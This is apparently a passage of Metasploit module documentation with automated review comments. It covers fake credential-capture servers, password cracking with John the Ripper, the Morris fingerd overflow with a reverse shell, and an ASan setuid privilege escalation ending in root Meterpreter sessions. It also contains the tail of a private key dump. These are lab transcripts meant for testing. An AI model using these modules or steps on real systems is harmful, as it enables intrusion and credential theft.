p89gbnDOj7FHCg2JPa9/dii6pBRHXeUfORp00GfN0oAjjJo14SmOw58zh1mF1VcA
BQhTK9TO4GXIEZDiYt9EmiH1VO58I8vUecBcbelirumGOP+dBiBy/C8YzFJRhAis
eAGSi8F+qcJaS3VDRGEC9zcK
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUMlkpAG2tXodgLSrIf/xOuA9z8PwwDQYJKoZIhvcNAQEL
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDkwMTI3MTRaFw0xOTEx
MDkwMTI3MTRaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQDAXME8r2vEUH7BKelkt9iC4tTozOq0wJAjsACLCDcN
oD4hUH16wy4Uf4SD3ZsEaL0YA0GU2ZgOo2udUSBpOo8h9FEGtRrAAeSl7Z3XaBnu
B7UmVMrnUVZxlaYi84JcopcTOs6KZ5VXddiaPEkE5G3jaCwOIqHk+c8Qk5b43HQb
kj2jr4051gHeWP0UgBEy1TVPKtoywtyK1b5HQhX7MYVNge8lQL/xJnBrjMDqIQqc
41lCI73EPCuGZ7zB06xBsgyW/DTgQkprX+QeDVKtz8ZChLSqSwmz/5yFttRyZlDu
XA7Kozhdj8obRAjzK/gKj89WsX/s2KUbq2GYpdMpLh7/AgMBAAGjUzBRMB0GA1Ud
DgQWBBRezbFZBumaJ/MViZqqbllYrPomMzAfBgNVHSMEGDAWgBRezbFZBumaJ/MV
iZqqbllYrPomMzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAd
Smkooa2nhdDdu3/uHX8vhDC0ns5qotgd0YKGkj/QyzNP+ruP1cyq/q67zand/Eq8
gF+lHk+pX8GM0WvI7ypgrK956YCdmh3DULBFDu5RxVABFWrGedfNy6TKLTps0PXR
9mdB/HK0Msr6Mh/o5PkUhb1fx0T3NUwF1EFte7Nsq10Mq+hYVnEqDeEGMlb73frJ
729tCjNpFoLGdlgEcAEFelAujV0w4oj35CE2Fh3b+4wupDiulfgg9E7FtvS9xK0P
l/m7Kka0n7lXnKo+IFSJ0dTooBvwaV7+4tEGuHxWJsNO+2aex9qFCuDUdBFxyWyK
uBVlsY6F7EjTfWpxwyVP
-----END CERTIFICATE-----
msf5 > use auxiliary/server/capture/imap
msf5 auxiliary(server/capture/imap) > set ssl true
ssl => true
msf5 auxiliary(server/capture/imap) > set sslcert /root/metasploit-framework/selfsigned.pem
sslcert => /root/metasploit-framework/selfsigned.pem
msf5 auxiliary(server/capture/imap) > set srvport 993
srvport => 993
msf5 auxiliary(server/capture/imap) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/imap) >
[*] Started service listener on 0.0.0.0:993
[*] Server started.
[+] IMAP LOGIN 127.0.0.1:59024 "johndoe" / "p455w0rd"
```

Clients:

```
root@kali:~# cat ~/.muttrc
set spoolfile="imaps://johndoe:p455w0rd@127.0.0.1/INBOX"
set folder="imaps://127.0.0.1/INBOX"
set record="=Sent"
set postponed="=Drafts"

root@kali:~# mutt
```

The user is prompted about the invalid certificate, and the client gets stuck at "Logging in...", however
it doesn't matter since the credentials have already been sent.
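Review bot: the heading `### Secure IMAP with Self-Signed Certificate and Alpine client` does not match the client actually shown, which is mutt (`cat ~/.muttrc` followed by `mutt`); either rename the heading or show an Alpine session. Two smaller points in the same file: the banner list entry `Microsoft Exchange Server 2003 IMAP4rev1 server versino 6.5.7638.1 (domain.local) ready.` misspells `version`, and in the telnet transcript `quit` is not an IMAP command (a tagged `01 LOGOUT` is the IMAP form), so the transcript should either use that or note that the line is simply what was typed. As in the HTTP doc, the full selfsigned.pem dump could be elided.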
@ -0,0 +1,72 @@
This module creates a mock MySQL server which accepts credentials. Upon receiving a login attempt, an `ERROR 1045 (2800): Access denied` error is thrown.

## Verification Steps

1. Start msfconsole
2. Do: ```use auxiliary/server/capture/mysql```
3. Do: ```run```

## Options

**CHALLENGE**

The MySQL 16 byte challenge used in the authentication. Default is `112233445566778899AABBCCDDEEFF1122334455`.

**JOHNPWFILE**

Write a file containing a John the Ripper format for cracking the credentials. Default is ``.

**CAINPWFILE**

Write a file containing a Cain & Abel format for cracking the credentials. Default is ``.

**SRVVERSION**

The MySQL version to print in the login banner. Default is `5.5.16`.

**SSL**

Boolean if SSL should be used. Default is `False`.

**SSLCert**

File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.

## Scenarios

### MySQL with MySQL Client and JTR Cracking

Server:

```
msf5 > use auxiliary/server/capture/mysql
msf5 auxiliary(server/capture/mysql) > set johnpwfile /tmp/mysql.logins
johnpwfile => /tmp/mysql.logins
msf5 auxiliary(server/capture/mysql) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/mysql) >
[*] Started service listener on 0.0.0.0:3306
[*] Server started.
[+] 127.0.0.1:59604 - User: admin; Challenge: 112233445566778899aabbccddeeff1122334455; Response: 46677c2d9cac93da328c4321060c125db759925e
```

Client:

```
root@kali:~# mysql -u admin -ppassword1 -h 127.0.0.1
ERROR 1045 (28000): Access denied for user 'admin'@'127.0.0.1' (using password: YES)
```

JTR:

```
root@kali:~# john /tmp/mysql.logins_mysqlna
Using default input encoding: UTF-8
Loaded 1 password hashes with no different salts (mysqlna, MySQL Network Authentication [SHA1 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
password1 (admin)
1g 0:00:00:00 DONE 2/3 (2018-11-08 21:05) 20.00g/s 16800p/s 16800c/s 16800C/s password1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
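Review bot: the CHALLENGE option is described as "The MySQL 16 byte challenge", but the stated default `112233445566778899AABBCCDDEEFF1122334455` is 40 hex digits, i.e. 20 bytes, and the scenario output echoes the same 40-digit challenge; correct the description to 20 bytes rather than shortening the default. Separately, the introduction quotes the error as `ERROR 1045 (2800): Access denied` while the client transcript shows `ERROR 1045 (28000)`; the SQLSTATE is five characters, so the introduction should read `28000`.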
@ -0,0 +1,43 @@
This module creates a mock PostgreSQL server which accepts credentials. Upon receiving a login attempt, a
`FATAL: password authentication failed for user` error is thrown.

## Verification Steps

1. Start msfconsole
2. Do: ```use auxiliary/server/capture/postgresql```
3. Do: ```run```

## Options

**SSL**

Boolean if SSL should be used. Default is `False`.

**SSLCert**

File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is null.

## Scenarios

### PostgreSQL Server and psql Client

Server:

```
msf5 > use auxiliary/server/capture/postgresql
msf5 auxiliary(server/capture/postgresql) > run
[*] Auxiliary module running as background job 0.

[*] Started service listener on 0.0.0.0:5432
[*] Server started.
[+] PostgreSQL LOGIN 127.0.0.1:49882 msf / pwn_all_da_tings / msf
```

Client:

```
root@kali:~# psql -U msf -h 127.0.0.1
Password for user msf:
psql: FATAL: password authentication failed for user "msf"
```
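Review bot: the SSLCert option ends with `Default is null.` whereas every other capture module doc in this change writes the empty default as an empty backtick pair; use the same form here for consistency. The captured line `[+] PostgreSQL LOGIN 127.0.0.1:49882 msf / pwn_all_da_tings / msf` would also benefit from a sentence naming its three fields (presumably user / password / database, psql defaulting the database name to the user name), since the client command only shows `-U msf` and a reader cannot tell what the trailing `msf` is.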
@ -0,0 +1,73 @@
This module creates a mock print server which accepts print jobs.

## Verification Steps

1. Start msfconsole
2. Do: ```use auxiliary/server/capture/printjob_capture```
3. Do: ```set MODE [mode]```
4. Do: ```run```

## Options

**FORWARD**

After the print job is captured, should it be forwarded to another printer. Default is `false`.

**RPORT**

If `forward` is set, this is the port of the remote printer to forward the print job to. Default is `9100`.

**RHOST**

If `forward` is set, this is the IP of the remote printer to forward the print job to.

**METADATA**

If set to `true` the print job metadata will be printed to screen. Default is `true`.

**MODE**

Set the printer mode. RAW format, which typically runs on port `9100`, is a raw TCP data stream that would send to a printer.
`LPR`, Line Printer remote, which typically runs on port 515, is the newer more widely accepted standard. Default is `RAW`.

## Scenarios

### Capturing a RAW print job

Server:

```
msf5 > use auxiliary/server/capture/printjob_capture
msf5 auxiliary(server/capture/printjob_capture) > run
[*] Auxiliary module running as background job 0.

[*] Starting Print Server on 0.0.0.0:9100 - RAW mode
[*] Started service listener on 0.0.0.0:9100
[*] Server started.
msf5 auxiliary(server/capture/printjob_capture) > [*] Printjob Capture Service: Client connection from 127.0.0.1:44678
[*] Printjob Capture Service: Client 127.0.0.1:44678 closed connection after 249 bytes of data
[-] Unable to detect printjob type, dumping complete output
[+] Incoming printjob - Unnamed saved to loot
[+] Loot filename: /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin

msf5 auxiliary(server/capture/printjob_capture) > cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin
[*] exec: cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin

PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2018.4"
VERSION_ID="2018.4"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
```

Client:

```
root@kali:~# cat /etc/os-release | nc 127.0.0.1 9100
^C
```
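Review bot: in the MODE option, "RAW format, which typically runs on port `9100`, is a raw TCP data stream that would send to a printer" is missing its subject (the client sends the stream to the printer), and the two modes are formatted inconsistently, RAW in plain text and `LPR` in code; suggest "a raw TCP data stream that a client sends to a printer" and code formatting for both. In the same Options section, FORWARD is phrased as a question ("should it be forwarded to another printer.") but ends in a full stop, and RHOST gives neither a default nor a note that it is required when FORWARD is set, unlike RPORT which states its default.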
@ -0,0 +1,57 @@
This module creates a mock telnet server which accepts credentials. Upon receiving a login attempt, a `Login failed` error is thrown.

## Verification Steps

1. Start msfconsole
2. Do: ```use auxiliary/server/capture/telnet```
3. Do: ```run```

## Options

**BANNER**

The Banner which should be displayed. Default is empty, which will display `Welcome`.

**SSL**

Boolean if SSL should be used. Default is `False`.

**SSLCert**

File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.

## Scenarios

### Telnet Server and Client

Server:

```
msf5 > use auxiliary/server/capture/telnet
msf5 auxiliary(server/capture/telnet) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/telnet) >
[*] Started service listener on 0.0.0.0:23
[*] Server started.
[+] TELNET LOGIN 127.0.0.1:40016 root / <3@wvu_is_my_hero
```

Client:

```
root@kali:~# telnet 127.0.0.1
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

Welcome

Login: root
Password: <3@wvu_is_my_hero


Login failed

Connection closed by foreign host.
```
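Review bot: the client transcript shows the typed password echoed in the clear (`Password: <3@wvu_is_my_hero`); a sentence in the scenario saying this is the expected behaviour of the mock server would stop readers following the verification steps from mistaking it for a local terminal problem. Also, the SSL option here only says "Boolean if SSL should be used", while the HTTP and IMAP docs in this change also state the port the TLS variant typically runs on; the same hint would be useful here.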
@ -0,0 +1,69 @@
This module creates a mock VNC server which accepts credentials. Upon receiving a login attempt, an `Authentication failure` error is thrown.

## Verification Steps

1. Start msfconsole
2. Do: ```use auxiliary/server/capture/vnc```
3. Do: ```run```

## Options

**CHALLENGE**

The 16 byte challenge used in the authentication. Default is `00112233445566778899aabbccddeeff`.

**JOHNPWFILE**

Write a file containing a John the Ripper format for cracking the credentials. Default is ``.

**SSL**

Boolean if SSL should be used. Default is `False`.

**SSLCert**

File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.

## Scenarios

### VNC with vncviewer and JTR Cracking

Server, Client:

```
msf5 > use auxiliary/server/capture/vnc
msf5 auxiliary(server/capture/vnc) > use auxiliary/server/capture/vnc
msf5 auxiliary(server/capture/vnc) > set johnpwfile /tmp/john
johnpwfile => /tmp/john
msf5 auxiliary(server/capture/vnc) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/vnc) >
[*] Started service listener on 0.0.0.0:5900
[*] Server started.

msf5 auxiliary(server/capture/vnc) > vncviewer 127.0.0.1
[*] exec: vncviewer 127.0.0.1

Connected to RFB server, using protocol version 3.7
Performing standard VNC authentication
Password:
Authentication failure

[+] 127.0.0.1:40240 - Challenge: 00112233445566778899aabbccddeeff; Response: b7b9c87777661a7a2299733209bfdfce
```

John the Ripper (JTR) Cracker:

```
msf5 auxiliary(server/capture/vnc) > john /tmp/john_vnc
[*] exec: john /tmp/john_vnc

Using default input encoding: UTF-8
Loaded 1 password hash (VNC [DES 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
password (?)
1g 0:00:00:00 DONE 2/3 (2018-11-11 20:38) 25.00g/s 75.00p/s 75.00c/s 75.00C/s password
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
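Review bot: the scenario transcript runs `use auxiliary/server/capture/vnc` twice in a row, the second time from inside the module context, which reads like a paste error; drop the duplicate line. The JTR output line `password (?)` is expected, since standard VNC authentication carries no user name, and a short note saying so would save readers wondering why the MySQL scenario shows `(admin)` while this one shows `(?)`.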
@ -0,0 +1,78 @@
## Intro

This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

## Setup

A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.

For manual setup, please follow the Computer History Wiki's
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

## Targets

```
Id Name
-- ----
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
```

## Options

**RPORT**

Set this to the target port. The default is 79 for `fingerd`, but the
port may be forwarded when NAT (SLiRP) is used in SIMH.

**PAYLOAD**

Set this to a BSD VAX payload. Currently only
`bsd/vax/shell_reverse_tcp` is supported.

## Usage

```
msf5 exploit(bsd/finger/morris_fingerd_bof) > options

Module options (exploit/bsd/finger/morris_fingerd_bof):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 79 yes The target port (TCP)


Payload options (bsd/vax/shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85


msf5 exploit(bsd/finger/morris_fingerd_bof) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 127.0.0.1:79 - Connecting to fingerd
[*] 127.0.0.1:79 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500

whoami
nobody
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986

Would you like to play a game?
```
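Review bot: "This vulnerability was exploited by the Morris worm in 1988-11-02." should read "on 1988-11-02" (or "in November 1988"). Minor: the Usage block targets `RHOSTS 127.0.0.1` and the session opens as `192.168.1.2:4444 -> 192.168.1.2:51992`, which is consistent with the SIMH NAT (SLiRP) port forwarding mentioned under RPORT, but a one-line cross-reference there would stop readers expecting to see the VAX's own address.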
@ -0,0 +1,166 @@

## Description

This module attempts to gain root privileges on Linux systems using
setuid executables compiled with AddressSanitizer (ASan).

ASan configuration related environment variables are permitted when
executing setuid executables built with libasan. The `log_path` option
can be set using the `ASAN_OPTIONS` environment variable, allowing
clobbering of arbitrary files, with the privileges of the setuid user.

This module uploads a shared object and sprays symlinks to overwrite
`/etc/ld.so.preload` in order to create a setuid root shell.


## Vulnerable Application

[AddressSanitizer](https://clang.llvm.org/docs/AddressSanitizer.html) (ASan)
is a fast memory error detector. It consists of a compiler instrumentation
module and a run-time library.

An example executable can be compiled with ASan as follows:

```
gcc -s -lasan -fsanitize=address -o asan.elf helloworld.c
sudo mv asan.elf /usr/bin/asan.elf
sudo chown root:root /usr/bin/asan.elf
sudo chmod u+s /usr/bin/asan.elf
```


## Verification Steps

1. Start `msfconsole`
2. Get a session
3. `use use exploit/linux/local/asan_suid_executable_priv_esc`
4. `set SESSION [SESSION]`
5. `set SUID_EXECUTABLE /path/to/suid/compiled/with/asan`
6. `check`
7. `run`
8. You should get a new *root* session


## Options

**SESSION**

Which session to use, which can be viewed with `sessions`

**SUID_EXECUTABLE**

Path to a SUID executable compiled with ASan. (default: ``)

**SPRAY_SIZE**

Number of PID symlinks to create. (default: `50`)

**WritableDir**

A writable directory file system path. (default: `/tmp`)


## Scenarios

### Command Shell Session (Linux Mint 19)

```
msf5 > use exploit/linux/local/asan_suid_executable_priv_esc
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out
suid_executable => /usr/bin/a.out
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444
[+] /usr/bin/a.out is setuid
[+] /usr/bin/a.out was compiled with ASan
[+] gcc is installed
[*] Writing '/tmp/.pCriI' (291 bytes) ...
[*] Max line length is 65537
[*] Writing 291 bytes in 1 chunks of 937 bytes (octal-encoded), using printf
[*] Writing '/tmp/.JtSfQ1.c' (142 bytes) ...
[*] Max line length is 65537
[*] Writing 142 bytes in 1 chunks of 513 bytes (octal-encoded), using printf
[*] Writing '/tmp/.TCLmzU.so.c' (323 bytes) ...
[*] Max line length is 65537
[*] Writing 323 bytes in 1 chunks of 1167 bytes (octal-encoded), using printf
[*] Writing '/tmp/.V7OEFt.c' (253 bytes) ...
[*] Max line length is 65537
[*] Writing 253 bytes in 1 chunks of 906 bytes (octal-encoded), using printf
[*] Writing '/tmp/.LpfTKJwR' (256 bytes) ...
[*] Max line length is 65537
[*] Writing 256 bytes in 1 chunks of 942 bytes (octal-encoded), using printf
[*] Launching exploit...
[+] Success! /tmp/.JtSfQ1 is set-uid root!
-rwsr-xr-x 1 root root 8384 Jan 12 19:30 /tmp/.JtSfQ1
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (914728 bytes) to 172.16.191.211
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.211:56074) at 2019-01-12 03:30:47 -0500
[+] Deleted /tmp/.JtSfQ1.c
[+] Deleted /tmp/.TCLmzU.so.c
[+] Deleted /tmp/.TCLmzU.so
[+] Deleted /tmp/.V7OEFt.c
[+] Deleted /tmp/.V7OEFt
[+] Deleted /tmp/.LpfTKJwR

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.211
OS : LinuxMint 19 (Linux 4.15.0-20-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```

### Meterpreter Session (Linux Mint 19)

```
msf5 > use exploit/linux/local/asan_suid_executable_priv_esc
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out
suid_executable => /usr/bin/a.out
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444
[+] /usr/bin/a.out is setuid
[+] /usr/bin/a.out was compiled with ASan
[+] gcc is installed
[*] Writing '/tmp/.XBKiFa' (291 bytes) ...
[*] Writing '/tmp/.ooMwKnEXt.c' (142 bytes) ...
[*] Writing '/tmp/.cWZL3A.so.c' (329 bytes) ...
[*] Writing '/tmp/.78iKLJOvX.c' (254 bytes) ...
[*] Writing '/tmp/.WkXgm2agJ8' (261 bytes) ...
[*] Launching exploit...
[+] Success! /tmp/.ooMwKnEXt is set-uid root!
-rwsr-xr-x 1 root root 8384 Jan 12 19:42 /tmp/.ooMwKnEXt
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (914728 bytes) to 172.16.191.211
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.211:56080) at 2019-01-12 03:42:43 -0500
[+] Deleted /tmp/.XBKiFa
[+] Deleted /tmp/.ooMwKnEXt.c
[+] Deleted /tmp/.cWZL3A.so.c
[+] Deleted /tmp/.cWZL3A.so
[+] Deleted /tmp/.78iKLJOvX.c
[+] Deleted /tmp/.78iKLJOvX
[+] Deleted /tmp/.WkXgm2agJ8

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.211
OS : LinuxMint 19 (Linux 4.15.0-20-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```

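Review bot: step 3 of Verification Steps reads `use use exploit/linux/local/asan_suid_executable_priv_esc`; drop the repeated `use` so the line can be pasted into msfconsole as written. Under Options, `**SUID_EXECUTABLE**` ends with `(default: ``)`, which renders as an empty pair of backticks; say instead that the option is required and has no default. The Description states that ASan environment variables are honoured by setuid executables built with libasan, but nothing in the file says which compiler or libasan releases this was observed on (the scenarios only show Linux Mint 19 and `gcc is installed`), so a reader cannot tell when `check` should be expected to report the target as not vulnerable; the Vulnerable Application section is the place to record the toolchain the scenarios were run against. Lastly, the two scenarios are titled Command Shell Session and Meterpreter Session, yet both transcripts begin at `set session 1` without showing the type of session 1, so the distinction the titles draw is not visible in the output; a `sessions -l` line at the top of each transcript would make it so.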
@ -24,9 +24,9 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862

## Options

**USERNAME** The username for Cisco Firepower Management console
**USERNAME** The username for Cisco Firepower Management console.

**Password** The password for Cisco Firepower Management cosnole
**PASSWORD** The password for Cisco Firepower Management console.

**NEWSSHUSER** The SSH account to create. By default, this is random.
